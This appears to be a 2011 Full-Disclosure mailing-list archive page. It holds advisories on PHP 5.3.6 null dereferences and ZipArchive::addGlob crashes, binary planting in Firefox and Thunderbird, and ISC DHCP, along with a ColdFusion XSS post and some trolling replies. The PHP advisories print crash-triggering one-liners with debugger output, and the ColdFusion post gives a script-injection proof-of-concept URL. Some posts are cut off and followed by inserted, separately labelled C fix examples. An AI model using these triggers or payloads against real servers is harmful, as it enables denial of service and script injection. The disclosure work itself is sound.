[Full-disclosure] PHP 5.3.6 multiple null pointer dereference

2011-08-18 Thread Maksymilian Arciemowicz

[ PHP 5.3.6 multiple null pointer dereference ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/

Date:
- Dis.: 20.07.2011
- Pub.: 19.08.2011

Affected Software (verified):
PHP 5.3.6 and prior

Fixed:
PHP 5.3.7

Original URL:
http://securityreason.com/achievement_securityalert/101


--- 0.Description ---
PHP is a general-purpose scripting language originally designed for web
development to produce dynamic web pages. For this purpose, PHP code is
embedded into the HTML source document and interpreted by a web server
with a PHP processor module, which generates the web page document. It
also has evolved to include a command-line interface capability and can
be used in standalone graphical applications.


--- 1. PHP 5.3.6 multiple null pointer dereference ---
Some time ago we reported a list of possible NULL pointer
dereferences in PHP 5.3.6. If a user can change the size passed to
malloc, it's possible to get NULL pointer dereferences. I haven't had
enough time to check the security impact of all these bugs.

To demonstrate these flaws, we may use the default memory limit in
OpenBSD [512MB]. We should allocate a lot of memory, like 510MB (still
2MB free). If some string is longer than 2MB (for example 4MB), and PHP
tries to copy this string using malloc/strlen etc., then malloc returns
NULL. Then the program is counting with possible NULL pointer
dereference or buffer overflow symptoms.

Example:
http://cwe.mitre.org/data/definitions/690.html

where CWE-690 gives CWE-476 NULL pointer dereference

A good example for CWE-690 is

tz->location.comments = malloc(comments_len + 1);
memcpy(tz->location.comments, *tzf, comments_len);

This code may lead to a null pointer dereference or a simple crash when
nulling memory with memset()

in.str = malloc((e - s) + YYMAXFILL);
memset(in.str, 0, (e - s) + YYMAXFILL);
memcpy(in.str, s, (e - s));

Program received signal SIGSEGV, Segmentation fault.
0xbba7581c in memset () from /usr/lib/libc.so.12
(gdb) x/i $eip
0xbba7581c : rep stos %eax,%es:(%edi)
(gdb) x/x $eax
0x0:Cannot access memory at address 0x0
(gdb) x/x $edi
0x0:Cannot access memory at address 0x0

In this case, memset() overwrites the memory with the 0x0 char. If an
attacker can put something other than 0x0, it would have security impact.

There are more interesting places where a user may try to change the
size of a malloc. See below.

-id0-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/curl/interface.c?view=markup

    if (!CRYPTO_get_id_callback()) {
        int i, c = CRYPTO_num_locks();

        php_curl_openssl_tsl = malloc(c * sizeof(MUTEX_T));

        for (i = 0; i < c; ++i) {
            php_curl_openssl_tsl[i] = tsrm_mutex_alloc();
        }

        CRYPTO_set_id_callback(php_curl_ssl_id);
        CRYPTO_set_locking_callback(php_curl_ssl_lock);
    }
-id0-end-


-id1-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_date.c?view=markup
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_iso_intervals.c?view=markup
multiple malloc/calloc/realloc

    uchar *buf = (uchar*) malloc(((s->lim - s->bot) + BSIZE)*sizeof(uchar));
    memcpy(buf, s->tok, s->lim - s->tok);

    str = calloc(1, end - begin + 1);
    memcpy(str, begin, end - begin);

    s->errors->warning_messages = realloc(s->errors->warning_messages,
        s->errors->warning_count * sizeof(timelib_error_message));
    s->errors->warning_messages[s->errors->warning_count - 1].position =
        s->tok ? s->tok - s->str : 0;
    s->errors->warning_messages[s->errors->warning_count - 1].character =
        s->tok ? *s->tok : 0;
    s->errors->warning_messages[s->errors->warning_count - 1].message =
        strdup(error);
-id1-end-


-id2-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_tz.c?view=markup

    tz->location.comments = malloc(comments_len + 1);
    memcpy(tz->location.comments, *tzf, comments_len);
    tz->location.comments[comments_len] = '\0';
    *tzf += comments_len;
-id2-end-


-id3-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/timelib.c?revision=305315&view=markup

    tmp->trans = (int32_t *) malloc(tz->timecnt * sizeof(int32_t));
    tmp->trans_idx = (unsigned char*) malloc(tz->timecnt * sizeof(unsigned char));
    memcpy(tmp->trans, tz->trans, tz->timecnt * sizeof(int32_t));
    memcpy(tmp->trans_idx, tz->trans_idx, tz->timecnt * sizeof(unsigned char));

    tmp->type = (ttinfo*) malloc(tz->typecnt * sizeof(struct ttinfo));
    memcpy(tmp->type, tz->type, tz->typecnt * sizeof(struct ttinfo));

    tmp->timez
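
Added example (not part of the advisory and not PHP's own code): the checked form of the two patterns quoted above, the malloc+memcpy copy from parse_tz.c and the realloc-then-index append from parse_date.c. The struct names, function names and the injectable allocator hooks are assumptions made so the out-of-memory path can be exercised directly.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Allocator hooks (hypothetical): let the failure path run without
 * actually exhausting the process memory limit. */
typedef void *(*alloc_fn)(size_t);
typedef void *(*realloc_fn)(void *, size_t);
void *fail_alloc(size_t n) { (void)n; return NULL; }
void *fail_realloc(void *p, size_t n) { (void)p; (void)n; return NULL; }

/* Copy len bytes into a fresh NUL-terminated buffer; NULL on any failure. */
char *dup_bytes(const char *src, size_t len, alloc_fn alloc)
{
    char *buf;
    if (src == NULL || len == SIZE_MAX)   /* len + 1 would wrap to 0 */
        return NULL;
    buf = alloc(len + 1);
    if (buf == NULL)                      /* the check the quoted code lacks */
        return NULL;
    memcpy(buf, src, len);
    buf[len] = '\0';
    return buf;
}

struct location { char *comments; };

/* Checked malloc+memcpy: 0 on success, -1 on failure. On failure the
 * previous value is left untouched, so the caller can report and continue. */
int set_comments(struct location *loc, const char *src, size_t len, alloc_fn alloc)
{
    char *buf = dup_bytes(src, len, alloc);
    if (buf == NULL)
        return -1;
    free(loc->comments);
    loc->comments = buf;
    return 0;
}

struct message { int position; char character; char *text; };
struct message_list { struct message *items; size_t count; };

/* Checked realloc+index: the result goes into a temporary, so a failed
 * realloc neither loses the old array nor leads to a write through NULL. */
int add_message(struct message_list *l, int position, char character,
                const char *text, realloc_fn grow)
{
    struct message *items;
    char *copy;
    if (l->count >= SIZE_MAX / sizeof(struct message))
        return -1;                        /* (count + 1) * size would overflow */
    copy = dup_bytes(text, strlen(text), malloc);
    if (copy == NULL)
        return -1;
    items = grow(l->items, (l->count + 1) * sizeof(struct message));
    if (items == NULL) {                  /* old array is still valid and owned */
        free(copy);
        return -1;
    }
    items[l->count].position = position;
    items[l->count].character = character;
    items[l->count].text = copy;
    l->items = items;
    l->count++;                           /* count changes only after success */
    return 0;
}

int main(void)
{
    struct location loc = { NULL };
    struct message_list warnings = { NULL, 0 };
    printf("copy ok:          %d\n", set_comments(&loc, "Europe/Warsaw", 6, malloc));
    printf("copy under OOM:   %d (kept \"%s\")\n",
           set_comments(&loc, "other", 5, fail_alloc), loc.comments);
    printf("append ok:        %d\n", add_message(&warnings, 3, 'x', "warn", realloc));
    printf("append under OOM: %d (count %lu)\n",
           add_message(&warnings, 4, 'y', "lost", fail_realloc),
           (unsigned long)warnings.count);
    return 0;
}
```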

[Full-disclosure] PHP 5.3.6 ZipArchive invalid use glob(3)

2011-08-18 Thread Maksymilian Arciemowicz

[ PHP 5.3.6 ZipArchive invalid use glob(3) ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/
Date:
- Dis.: 01.04.2011
- Pub.: 19.08.2011

CVE: CVE-2011-1657

Affected Software (verified):
PHP 5.3.6 and prior

Fixed:
PHP 5.3.7

Original URL:
http://securityreason.com/achievement_securityalert/100


--- 0.Description ---
PHP is a general-purpose scripting language originally designed for web
development to produce dynamic web pages. For this purpose, PHP code is
embedded into the HTML source document and interpreted by a web server
with a PHP processor module, which generates the web page document. It
also has evolved to include a command-line interface capability and can
be used in standalone graphical applications.

ZipArchive
This extension enables you to transparently read or write ZIP compressed
archives and the files inside them.


--- 1. PHP 5.3.6 ZipArchive invalid use glob(3) ---
Functions like addGlob and addPattern are not described in the
documentation. Anyway, we can call ZipArchive::addGlob and
ZipArchive::addPattern in PHP 5.3.6

http://pl2.php.net/manual/en/class.ziparchive.php

Let's see ext/zip/php_zip.c

    if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL, &globbuf))) {
    ...
    /* 1 == glob, 2==pcre */
    if (type == 1) {
        if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|la",
                &pattern, &pattern_len, &flags, &options) == FAILURE) {
            return;
        }
    } else {
        if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|sa",
                &pattern, &pattern_len, &path, &path_len, &options) == FAILURE) {
            return;
        }
    }
1641

Invalid &flags may lead to a crash. To use flags like GLOB_ALTDIRFUNC,
we should first declare gl_opendir, gl_closedir, gl_lstat, gl_stat. In
PHP we only have

    glob_t globbuf;
    ...
    globbuf.gl_offs = 0;
    if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL, &globbuf))) {

For addGlob() there is no GLOB flags validation like in php/glob().
Only flags like
GLOB_MARK|GLOB_NOSORT|GLOB_NOCHECK|GLOB_NOESCAPE|GLOB_BRACE|GLOB_ONLYDIR|GLOB_ERR
should be allowed:

- GLOB_MARK - Adds a slash to each directory returned
- GLOB_NOSORT - Return files as they appear in the directory (no sorting)
- GLOB_NOCHECK - Return the search pattern if no files matching it were
  found
- GLOB_NOESCAPE - Backslashes do not quote metacharacters
- GLOB_BRACE - Expands {a,b,c} to match 'a', 'b', or 'c'
- GLOB_ONLYDIR - Return only directory entries which match the pattern
- GLOB_ERR - Stop on read errors (like unreadable directories), by
  default errors are ignored.

---linux/ubuntu---
cx@cx64:~$ php -v
PHP 5.3.3-1ubuntu9.3 with Suhosin-Patch (cli) (built: Jan 12 2011 16:07:38)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
cx@cx64:~$ uname -a
Linux cx64 2.6.35-28-generic #49-Ubuntu SMP Tue Mar 1 14:39:03 UTC 2011 x86_64 GNU/Linux
cx@cx64:/www$ cat zip.php
open("empty.zip");$nx->addGlob(str_repeat("*",33),0x39);
?>cx@cx64:/www$ php zip.php
Segmentation fault
---linux/ubuntu---


Tested with NetBSD glob(3) implementation (netbsd 5.1 and PHP 5.3.6)


---bsd/netbsd---
unlink("empty.zip"); fopen("empty.zip","a"); $nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("A",100),0x39);

Program received signal SIGSEGV, Segmentation fault.
0xbb86bb12 in realloc () from /usr/lib/libc.so.12
(gdb) i r
eax            0x410041     4259905
ecx            0xc          12
edx            0xbfb0       -1078984704
ebx            0xbb8c81f4   -1148419596
esp            0xbfbfa980   0xbfbfa980
ebp            0xbfbfa9d8   0xbfbfa9d8
esi            0xfc000      1032192
edi            0x0          0
eip            0xbb86bb12   0xbb86bb12
(gdb) x/i $eip
0xbb86bb12 :   mov    0x8(%eax),%edi
(gdb) x/i $eax
0x410041:   Cannot access memory at address 0x410041
---bsd/netbsd---

and now try 'B'

---bsd/netbsd---
unlink("empty.zip");
fopen("empty.zip","a");
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("B",100),0x39);
(gdb) x/i $eip
0xbb86bb12 :   mov    0x8(%eax),%edi
(gdb) x/i $eax
0x420042:   Cannot access memory at address 0x420042
---bsd/netbsd---

A: we get mov 0x8(%eax),%edi where eax=0x410041
B: we get mov 0x8(%eax),%edi where eax=0x420042

and once again for eax=0x0


---bsd/netbsd---
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob("aa",0x39);

Program received signal SIGSEGV, Segmentation fault.
0xbb8e2960 in pthread_mutex_lock () from /usr/lib/libpthread.so.0
(gdb) bt
#0  0xbb8e2960 in pthread_mutex_lock () from /usr/lib/libpthread.so.0
#1  0xbb86a43a in _malloc_prefork () from /usr/lib/libc.so.12
#2  0xbb86bb9c in realloc () from /usr/lib/libc.so.12
#3  0xbb83610b in __globfree30 () from /usr/lib/libc.so.12
#4  0xbb836cb7 in __globfree30 () from /usr/
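
Added example (not part of the advisory and not the change shipped in PHP 5.3.7): one way to apply the flag allowlist the advisory lists before script-supplied flags reach glob(3). The wrapper name checked_glob, its return convention and the sample pattern are assumptions.

```c
#include <glob.h>
#include <stdio.h>
#include <string.h>

/* GLOB_BRACE and GLOB_ONLYDIR are extensions; treat them as absent where
 * the platform's <glob.h> does not define them. */
#ifndef GLOB_BRACE
#define GLOB_BRACE 0
#endif
#ifndef GLOB_ONLYDIR
#define GLOB_ONLYDIR 0
#endif

/* The flags the advisory lists as acceptable for script-supplied input. */
#define ALLOWED_GLOB_FLAGS \
    (GLOB_MARK | GLOB_NOSORT | GLOB_NOCHECK | GLOB_NOESCAPE | \
     GLOB_BRACE | GLOB_ONLYDIR | GLOB_ERR)

/* Hypothetical wrapper. Returns:
 *    0  glob(3) succeeded, *out is filled (caller must globfree(out))
 *   -1  rejected before calling glob(3): bad arguments or a flag outside
 *       the allowlist
 *    1  glob(3) itself failed; its own return code is stored in *glob_err
 *
 * Flags such as GLOB_APPEND, GLOB_DOOFFS and GLOB_ALTDIRFUNC make glob(3)
 * read fields of the caller's glob_t, so they must never come from input
 * that the caller has not prepared the structure for. */
int checked_glob(const char *pattern, long user_flags, glob_t *out, int *glob_err)
{
    int ret;
    if (pattern == NULL || out == NULL || glob_err == NULL)
        return -1;
    /* The long cast also rejects any bit above the int range. */
    if (user_flags < 0 || (user_flags & ~(long)ALLOWED_GLOB_FLAGS) != 0)
        return -1;
    memset(out, 0, sizeof(*out));        /* start from a known state */
    ret = glob(pattern, (int)user_flags, NULL, out);
    *glob_err = ret;
    return ret == 0 ? 0 : 1;
}

int main(void)
{
    glob_t g;
    int err = 0;
    /* Constructed pattern: matches nothing, so GLOB_NOCHECK echoes it back. */
    const char *pattern = "/constructed-no-such-dir-7c1e/*";

    printf("GLOB_APPEND from input: %d\n", checked_glob("*", GLOB_APPEND, &g, &err));
    printf("GLOB_DOOFFS from input: %d\n", checked_glob("*", GLOB_DOOFFS, &g, &err));
    if (checked_glob(pattern, GLOB_NOCHECK | GLOB_NOSORT, &g, &err) == 0) {
        printf("allowed flags: %lu result, first is %s\n",
               (unsigned long)g.gl_pathc, g.gl_pathv[0]);
        globfree(&g);
    }
    return 0;
}
```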

[Full-disclosure] ?

2011-08-18 Thread RandallM
sabu???

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] ASPR #2011-08-18-1: Remote Binary Planting in Mozilla Firefox

2011-08-18 Thread ACROS Security Lists
=[BEGIN-ACROS-REPORT]=

PUBLIC

=
ACROS Security Problem Report #2011-08-18-1
-
ASPR #2011-08-18-1: Remote Binary Planting in Mozilla Firefox
=

Document ID: ASPR #2011-08-18-1-PUB
Vendor:  Mozilla (http://www.mozilla.org)
Target:  Mozilla Firefox 
Impact:  Remote execution of arbitrary code
Severity:  Very high
Status:  Official fix available, workarounds available
Discovered by:   Jure Skofic of ACROS Security

CVSS score:  9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CVE ID:  CVE-2011-2980
CWE ID:  CWE-426: Untrusted Search Path

Current version 
   http://www.acrossecurity.com/aspr/ASPR-2011-08-18-1-PUB.txt


Summary
===

A "binary planting" [1] vulnerability in Mozilla Firefox allows local 
or remote (even Internet-based) attackers to deploy and execute malicious 
code on Windows machines in the context of logged-on users.


Product Coverage


- Mozilla Firefox 3.6.19 and earlier versions for Windows


Analysis 


As a result of an incorrect dynamic link library loading in Mozilla 
Firefox for Windows, an attacker can cause her malicious DLL to be loaded 
and executed from local drives, remote Windows shares, and even shares 
located on Internet. 

All a remote attacker has to do is plant a malicious DLL with a specific 
name on a network share and get the user to open a specially crafted HTML 
file from this network location - which should require minimal social 
engineering. Since Windows systems by default have the Web Client service 
running - which makes remote network shares accessible via WebDAV -, the 
malicious DLL can also be deployed from an Internet-based network share as 
long as the intermediate firewalls allow outbound HTTP traffic to the 
Internet. 

A systematic attack could deploy malicious code to a large number of 
Windows workstations in a short period of time, possibly as an Internet 
worm.

Visit http://www.binaryplanting.com/ for more information on binary 
planting vulnerabilities and attacks.

Additional details are available to interested corporate and government 
customers under NDA, as public disclosure would reveal too many details on 
the vulnerability and unduly accelerate malicious exploitation.



Mitigating Factors 
==

- A firewall blocking outbound WebDAV traffic (in addition to blocking all 
  Windows Networking protocols) could stop an Internet-based attack.

- Microsoft's CWDIllegalInDllSearch hotfix [2] can stop a network-based 
  exploitation of this vulnerability.


Solution 


Mozilla has issued a security bulletin [3] and published a remediated 
version of Firefox that fixes this issue.


Workaround 
==

- Stopping the Web Client service could stop Internet-based attacks as 
  long as the network firewall stops outbound Microsoft Networking 
  protocols. This would not, however, stop remote LAN-based attacks where 
  the attacker is able to place a malicious DLL on a network share inside 
  the target (e.g., corporate) network.
  
- General recommendations for limiting or stopping binary planting attacks 
  are available at 
  http://www.binaryplanting.com/guidelinesAdministrators.htm


Related Services


ACROS is offering professional consulting on this issue to interested 
corporate and government customers. Typical questions we can help you 
answer are:

1) To what extent is your organization affected by this issue?

2) Is it possible to get remote code from the Internet launched inside 
   your network? Can this be demonstrated?

3) Have you adequately applied the remedies to remove the vulnerability?

4) Are there circumstances in your environment that might prevent the 
   effectiveness of this fix?

5) Are there other workarounds that you could implement to fix this issue 
   more efficiently and/or inexpensively?

6) Are your systems or applications vulnerable to other similar issues?


Interested parties are encouraged to ask for more information at 
secur...@acrossecurity.com.


Background
==

ACROS Security has performed an extensive Binary Planting research 
project, focused on various types of vulnerabilities where an attacker 
with low privileges can place (i.e., "plant") a malicious executable file 
(i.e., "binary") to some possibly remote location and get it launched by 
some vulnerable application running on user's computer. 

The research found that binary planting vulnerabilities are affecting a 
large percentage of Windows applications and often allowing for trivial 
exploitation: it identified ~520 remotely exploitable bugs in ~200 widely-
used Windows applications. A large majority of these vulnerabilities 
remain unfixed and publicly unknown at the time of this writing.

Find o

[Full-disclosure] ASPR #2011-08-18-2: Remote Binary Planting in Mozilla Thunderbird

2011-08-18 Thread ACROS Security Lists
=[BEGIN-ACROS-REPORT]=

PUBLIC

=
ACROS Security Problem Report #2011-08-18-2
-
ASPR #2011-08-18-2: Remote Binary Planting in Mozilla Thunderbird
=

Document ID: ASPR #2011-08-18-2-PUB
Vendor:  Mozilla (http://www.mozilla.org)
Target:  Mozilla Thunderbird 
Impact:  Remote execution of arbitrary code
Severity:  Very high
Status:  Official fix available, workarounds available
Discovered by:   Jure Skofic of ACROS Security

CVSS score:  9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CVE ID:  CVE-2011-2980
CWE ID:  CWE-426: Untrusted Search Path

Current version 
   http://www.acrossecurity.com/aspr/ASPR-2011-08-18-2-PUB.txt


Summary
===

A "binary planting" [1] vulnerability in Mozilla Thunderbird allows local 
or remote (even Internet-based) attackers to deploy and execute malicious 
code on Windows machines in the context of logged-on users.


Product Coverage


- Mozilla Thunderbird 3.1.11 and earlier versions for Windows


Analysis 


As a result of an incorrect dynamic link library loading in Mozilla 
Thunderbird for Windows, an attacker can cause her malicious DLL to be 
loaded and executed from local drives, remote Windows shares, and even 
shares located on Internet. 

All a remote attacker has to do is plant a malicious DLL with a specific 
name on a network share and get the user to open a specially crafted  file 
from this network location - which should require minimal social 
engineering. Since Windows systems by default have the Web Client service 
running - which makes remote network shares accessible via WebDAV -, the 
malicious DLL can also be deployed from an Internet-based network share as 
long as the intermediate firewalls allow outbound HTTP traffic to the 
Internet. 

A systematic attack could deploy malicious code to a large number of 
Windows workstations in a short period of time, possibly as an Internet 
worm.

Visit http://www.binaryplanting.com/ for more information on binary 
planting vulnerabilities and attacks.

Additional details are available to interested corporate and government 
customers under NDA, as public disclosure would reveal too many details on 
the vulnerability and unduly accelerate malicious exploitation.



Mitigating Factors 
==

- A firewall blocking outbound WebDAV traffic (in addition to blocking all 
  Windows Networking protocols) could stop an Internet-based attack.

- Microsoft's CWDIllegalInDllSearch hotfix [2] can stop a network-based 
  exploitation of this vulnerability.


Solution 


Mozilla has issued a security bulletin [3] and published a remediated 
version of Thunderbird that fixes this issue.


Workaround 
==

- Stopping the Web Client service could stop Internet-based attacks as 
  long as the network firewall stops outbound Microsoft Networking 
  protocols. This would not, however, stop remote LAN-based attacks where 
  the attacker is able to place a malicious DLL on a network share inside 
  the target (e.g., corporate) network.
  
- General recommendations for limiting or stopping binary planting attacks 
  are available at 
  http://www.binaryplanting.com/guidelinesAdministrators.htm


Related Services


ACROS is offering professional consulting on this issue to interested 
corporate and government customers. Typical questions we can help you 
answer are:

1) To what extent is your organization affected by this issue?

2) Is it possible to get remote code from the Internet launched inside 
   your network? Can this be demonstrated?

3) Have you adequately applied the remedies to remove the vulnerability?

4) Are there circumstances in your environment that might prevent the 
   effectiveness of this fix?

5) Are there other workarounds that you could implement to fix this issue 
   more efficiently and/or inexpensively?

6) Are your systems or applications vulnerable to other similar issues?


Interested parties are encouraged to ask for more information at 
secur...@acrossecurity.com.


Background
==

ACROS Security has performed an extensive Binary Planting research 
project, focused on various types of vulnerabilities where an attacker 
with low privileges can place (i.e., "plant") a malicious executable file 
(i.e., "binary") to some possibly remote location and get it launched by 
some vulnerable application running on user's computer. 

The research found that binary planting vulnerabilities are affecting a 
large percentage of Windows applications and often allowing for trivial 
exploitation: it identified ~520 remotely exploitable bugs in ~200 widely-
used Windows applications. A large majority of these vulnerabilities 
remain unfixed and publicly unknown at the time of t

[Full-disclosure] [ MDVSA-2011:128 ] dhcp

2011-08-18 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2011:128
 http://www.mandriva.com/security/
 ___

 Package : dhcp
 Date: August 18, 2011
 Affected: 2009.0, 2010.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been discovered and corrected in dhcp:
 
 The server in ISC DHCP 3.x and 4.x before 4.2.2, 3.1-ESV before
 3.1-ESV-R3, and 4.1-ESV before 4.1-ESV-R3 allows remote attackers
 to cause a denial of service (daemon exit) via a crafted DHCP packet
 (CVE-2011-2748).
 
 The server in ISC DHCP 3.x and 4.x before 4.2.2, 3.1-ESV before
 3.1-ESV-R3, and 4.1-ESV before 4.1-ESV-R3 allows remote attackers to
 cause a denial of service (daemon exit) via a crafted BOOTP packet
 (CVE-2011-2749).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2748
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2749
 ___

 Updated Packages:


Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x10

2011-08-18 Thread Prototype This
Hi Moron.

Nobody cares about your silly shoops, get a life and stop spamming.

On 17 August 2011 21:03, Herr E Balls  wrote:
> Hi guys and welcome to day 17 of MOHSEP.
>
> here is today's link:
> http://mohsepblog.blogspot.com/2011/08/wednesday-august-17th-2011.html
>
> Until tomorrow :D :D
>
> Herr E Balls



[Full-disclosure] ColdFusion Local Parameter Xss Exploit

2011-08-18 Thread Rem7ter
*Describe:* ColdFusion probe.cfm page local parameter can XSS

*CVE:* Unknown

*PoC:*

http://127.0.0.1/CFIDE/probe.cfm?name=alert("G.R0b1n")
URL.Name parameter can XSS only locally.

Or visit:
http://www.focusecurity.org/2011/08/ColdFusion-Local-Parameter-Xss-Exploit.html

[Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x10

2011-08-18 Thread Herr E Balls
Hi guys and welcome to day 17 of MOHSEP.

here is today's link:
http://mohsepblog.blogspot.com/2011/08/wednesday-august-17th-2011.html

Until tomorrow :D :D

Herr E Balls